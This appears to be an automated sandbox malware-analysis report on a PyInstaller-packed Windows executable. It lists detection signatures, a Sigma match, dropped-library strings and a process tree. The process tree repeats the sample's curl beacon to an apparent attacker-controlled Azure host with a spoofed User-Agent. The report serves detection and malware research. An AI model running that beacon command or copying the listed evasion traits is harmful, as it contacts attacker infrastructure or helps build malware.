Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1563867
MD5:	93517c6eb21cd65e329b0acd9f6db5af
SHA1:	56866045c907c47dc4fcd2844117e1fd0f57ba37
SHA256:	08c2b931e06327dd440f89827e6556ac9e7966dc9e01dc2012aba9db90166957
Tags:	exex64user-jstrosch
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Found pyInstaller with non standard icon

Machine Learning detection for sample

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 93517C6EB21CD65E329B0ACD9F6DB5AF)

file.exe (PID: 6952 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 93517C6EB21CD65E329B0ACD9F6DB5AF)

cmd.exe (PID: 7084 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5328 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 4284 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 4928 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 3632 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 1704 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 2208 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 2028 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 4548 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 2000 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 4852 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 6192 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5740 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 6524 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7068 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 6580 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 1340 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 2120 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 2252 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 5080 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 3636 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 3752 cmdline: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5216 cmdline: curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cleanup

Sigma Signatures

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"", CommandLine: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6952, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -m 10 --header "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101" "http://spvmoslv.brazilsouth.cloudapp.azure.com/?m=835180"", ProcessId: 7084, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 92.6% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: file.exe, 00000000.00000003.1753781951.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: file.exe, 00000000.00000003.1754116826.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: file.exe, 00000000.00000003.1750041127.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: file.exe, 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: file.exe, 00000000.00000003.1750835118.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdb source: file.exe, 00000000.00000003.1749617862.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: file.exe, 00000000.00000003.1752138241.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: file.exe, 00000000.00000003.1753536442.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750835118.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: file.exe, 00000000.00000003.1754233802.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753659236.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: file.exe, 00000000.00000003.1748229034.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: file.exe, 00000000.00000003.1750386943.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: file.exe, 00000000.00000003.1752374384.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750386943.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: file.exe, 00000000.00000003.1751802736.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: file.exe, 00000000.00000003.1753385800.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753887474.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750280448.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751234279.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: file.exe, 00000000.00000003.1748719469.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: file.exe, 00000000.00000003.1749715082.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753536442.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: file.exe, 00000000.00000003.1751234279.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754433845.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-console-l1-1-0.pdb source: file.exe, 00000000.00000003.1749386479.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: file.exe, 00000000.00000003.1749812781.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-fibers-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: file.exe, 00000000.00000003.1749927325.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1752254686.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751102339.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: file.exe, 00000000.00000003.1752018194.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753999667.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: file.exe, 00000000.00000003.1753238604.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1752374384.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749509984.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: file.exe, 00000000.00000003.1748838656.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: file.exe, 00000000.00000003.1748393847.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749715082.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: file.exe, 00000000.00000003.1751453983.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: file.exe, 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: file.exe, 00000000.00000003.1749266271.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmp, _socket.pyd.0.dr
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749927325.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753238604.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754233802.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753385800.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: file.exe, 00000000.00000003.1754433845.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750170866.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-fibers-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749812781.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-fibers-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: file.exe, 00000000.00000003.1750280448.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: file.exe, 00000000.00000003.1759035583.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1752138241.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: file.exe, 00000000.00000003.1752018194.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: file.exe, 00000000.00000003.1750041127.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751453983.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: file.exe, 00000000.00000003.1751102339.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.0.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: file.exe, 00000000.00000003.1749509984.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: file.exe, 00000000.00000003.1752494159.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: file.exe, 00000000.00000003.1748229034.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: file.exe, 00000000.00000003.1750728421.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: file.exe, 00000000.00000003.1753887474.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750492184.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1751690780.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1754336115.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: file.exe, 00000000.00000003.1751343265.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1749617862.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: file.exe, 00000001.00000002.3017300090.00007FFDFB4CC000.00000002.00000001.01000000.00000005.sdmp, python311.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1750613362.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: file.exe, 00000000.00000003.1753781951.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: file.exe, 00000000.00000003.1750728421.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: file.exe, 00000000.00000003.1750979635.0000019DE7D27000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: file.exe, 00000000.00000003.1758420227.0000019DE7D20000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3018996963.00007FFE1A453000.00000002.00000001.01000000.00000008.sdmp, select.pyd.0.dr
